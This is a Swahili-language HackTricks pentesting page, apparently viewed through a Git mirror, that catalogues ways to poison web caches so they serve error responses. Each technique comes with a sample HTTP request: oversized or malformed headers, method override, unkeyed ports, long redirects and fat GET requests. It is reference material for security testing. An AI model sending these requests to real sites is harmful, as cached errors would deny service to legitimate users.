Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-01-21 01:24:14 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/cache-deception/cache-poisoning-to-dos.md

150 lines
6.2 KiB
Markdown
Raw Blame History

# Kuziba Cache kwa DoS
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% hint style="danger" %}
Kwenye ukurasa huu unaweza kupata mabadiliko tofauti kujaribu kufanya **seva ya wavuti itoe majibu ya makosa** kwa maombi ambayo ni **sahihi kwa seva za kuhifadhi**
{% endhint %}
* **Ukubwa wa Kichwa cha HTTP (HHO)**
Tuma ombi lenye ukubwa wa kichwa kubwa kuliko ile inayoungwa mkono na seva ya wavuti lakini ndogo kuliko ile inayoungwa mkono na seva ya kuhifadhi. Seva ya wavuti itajibu na majibu ya 400 ambayo yanaweza kuhifadhiwa:
```
GET / HTTP/1.1
Host: redacted.com
X-Oversize-Hedear:Big-Value-000000000000000
```
* **Herufi za Meta za HTTP (HMC) na Thamani Isiyotarajiwa**
Tuma kichwa kinachojumuisha **herufi za meta zenye madhara** kama vile `\n` na `\r`. Ili shambulio lifanye kazi lazima upuuze cache kwanza.
```
GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r
```
### Kichwa kilichowekwa vibaya kinaweza kuwa tu `\:` kama kichwa.
Hii inaweza pia kufanya kazi ikiwa thamani zisizotarajiwa zinatumwa, kama vile Content-Type isiyotarajiwa:
```
GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld
```
* **Kichwa kisichofungwa**
Baadhi ya tovuti zitarudisha msimbo wa hali ya kosa ikiwa **zinaona vichwa vya maalum** katika ombi kama vile kichwa cha _X-Amz-Website-Location-Redirect: kituFulani_.
```
GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing
HTTP/2 403 Forbidden
Cache: hit
Invalid Header
```
* **Mbinu ya Kudhibiti Mbinu ya HTTP (HMO)**
Ikiwa seva inasaidia kubadilisha mbinu ya HTTP na vichwa kama `X-HTTP-Method-Override`, `X-HTTP-Method` au `X-Method-Override`. Inawezekana kuomba ukurasa halali ukibadilisha mbinu hivyo seva haishirikishi hivyo jibu baya linacachwa:
```
GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST
```
* **Unkeyed Port**
Ikiwa bandari katika kichwa cha Mwenyeji inarejelewa kwenye jibu na haiko katika ufunguo wa cache, inawezekana kuirejelekeza kwenye bandari isiyotumiwa:
```
GET /index.html HTTP/1.1
Host: redacted.com:1
HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss
```
* **Kuongoza ndefu ya DoS**
Kama katika mfano ufuatao, x haichukuliwi, hivyo mshambuliaji anaweza kutumia tabia ya majibu ya kuongoza ili kupeleka kuongoza kwa URL kubwa sana ambayo itarudisha kosa. Kisha, watu wanaojaribu kupata URL bila ufunguo usiohifadhiwa x watapata jibu la kosa:
```
GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit
GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss
```
* **Ukaguzi wa kichwa cha mwenyeji**
Kichwa cha mwenyeji kinapaswa kuwa nyeti kwa herufi lakini baadhi ya tovuti zinatarajia kiwe kwa herufi ndogo na kurudi kosa ikiwa sio hivyo:
```
GET /img.png HTTP/1.1
Host: Cdn.redacted.com
HTTP/1.1 404 Not Found
Cache:miss
Not Found
```
* **Udhibiti wa njia**
Baadhi ya kurasa zitarudisha nambari za makosa zikipeleka data URLencode kwenye njia, hata hivyo, seva ya cache ita URLdecode njia hiyo na kuhifadhi jibu kwa njia iliyo URLdecoded:
```
GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com
HTTP/1.1 404 Not Found
Cach:miss
Not Found
```
* **Fat Get**
Baadhi ya seva za cache, kama Cloudflare, au seva za wavuti, huzuia maombi ya GET yenye mwili, hivyo inaweza kutumika vibaya kuhifadhi jibu lisilo sahihi:
```
GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3
xyz
HTTP/2 403 Forbidden
Cache: hit
```
## Marejeo
* [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
* [https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Reference in a new issue View git blame Copy permalink